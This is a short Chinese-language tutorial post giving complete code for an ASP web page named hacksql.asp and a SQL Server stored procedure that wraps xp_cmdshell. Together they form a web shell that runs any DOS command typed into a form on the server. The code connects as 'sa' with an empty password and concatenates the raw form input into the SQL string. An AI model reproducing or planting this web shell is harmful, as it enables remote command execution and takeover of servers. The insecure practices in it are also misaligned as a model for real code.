利用sql的存储过程实现dos命令的asp程序 |
作者:ddydy 发布时间:2005-03-12 来源:开发者俱乐部
|
1、首先在sql里面你能够访问的数据库里面建立存储过程,比如说:ddy 如下: CREATE PROCEDURE ddy @cmd varchar(50) AS exec master..xp_cmdshell @cmd 2、asp程序里如下:(hacksql.asp) <% cmd=trim(Request.Form("cmd")) if cmd<>"" then work() else show() end if function work() set conn=server.CreateObject("adodb.connection") set rs=server.CreateObject("adodb.recordset") conn.Open "xx","sa","" sql="exec ddy '"&cmd&"'" rs.Open sql,conn if not rs.EOF then do while not rs.eof Response.Write "<pre>"&htmlencode2(trim(rs(0)))&"</pre>" rs.MoveNext loop else Response.Write "no" end if if rs.State=1 then rs.close set rs=nothing conn.Close set conn=nothing end function function show() %> <form action=hacksql.asp method=post> 请输入DOS命令:<input type=text name=cmd> <input type=submit value="ok"> </form> <% end function function htmlencode2(str)'--------转换函数(为了显示时比较工整) dim result dim l if isnull(str) then htmlencode2="" exit function end if l=len(str) result="" dim i for i = 1 to l select case mid(str,i,1) case "<" result=result+"<" case ">" result=result+">" case chr(34) result=result+""" case "&" result=result+"&" case chr(13) result=result+"<br>" case chr(9) result=result+" " case "'" result=result+"’" case chr(32) result=result+" " if i+1<=l and i-1>0 then if mid(str,i+1,1)=chr(32) or mid(str,i+1,1)=chr(9) or mid(str,i-1,1)=chr(32) or mid(str,i-1,1)=chr(9) then result=result+" " else result=result+" " end if else result=result+" " end if case else result=result+mid(str,i,1) end select next htmlencode2=result end function %> |
|
|
|
|